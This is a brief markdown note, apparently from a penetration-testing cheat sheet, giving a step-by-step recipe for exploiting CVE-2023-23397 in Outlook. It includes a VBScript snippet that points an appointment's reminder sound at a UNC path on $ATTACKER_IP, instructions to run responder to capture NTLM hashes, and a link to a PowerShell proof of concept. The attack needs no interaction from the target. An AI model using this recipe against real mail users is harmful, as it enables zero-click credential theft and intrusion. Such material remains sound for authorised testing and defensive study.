# Outlook Exploits

## CVE-2023-23397

Create an Appointment with a custom and malicious reminder sound. The sound file download uses __Universal Naming Convention (UNC)__ paths to refrence the file. The file is stored on a server controlled by the attacker. Goal is to get the NTLM(v2) Hashes. There needs to be no interaction by the target.


Therefore, __PidLidReminderFileParameter__ have to be altered containing the UNC, for example `\\$ATTACKER_IP:$ATTACKER_PORT\payload.wav`. The source of the file may use __SMB__ or __WebDAV__.
Further, __PidLidReminderOverride__ has to be set to __true__.

### Usage

`New Appointment` --> set `Reminder` to 0 minutes.

`Outlook Spy` plugin is needed. Go to `OutlookSpy` tab, press `CurrentItem` and go to `Script`

Set the following variables:

```vbscript
AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = "\\$ATTACKER_IP\payloads\alert.wav"
```

* Set up `responder -I <interface>` to catch the NTLM hash.

Press `Run` to save the variables. Send the appointment afterwards.

### Resources

* [api0cradle's Powershell POC](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell.git)